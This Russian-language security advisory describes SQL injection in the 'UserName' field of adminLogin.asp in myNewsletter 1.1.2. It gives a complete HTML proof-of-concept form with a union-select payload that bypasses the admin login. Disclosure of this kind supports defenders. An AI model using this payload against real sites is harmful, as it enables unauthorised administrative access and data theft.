Программа: myNewsletter 1.1.2, возможно более ранние версии

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "UserName" в сценарии adminLogin.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для удачной эксплуатации уязвимости злоумышленник должен иметь доступ к административной части приложения.

Пример:

<html><center>
<h1>KAPDA myNewsletter 1.1.2 Login bypass PoC</h1>
<br>change action in source and then submit</center>
<form name="adminLogin" method="post" action="http://www.site.com/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br>
<input type="submit" name="Submit" value="Login">
</center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center>
<a href="http://www.kapda.ir">www.kapda.ir</a>
</center></form></html>
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии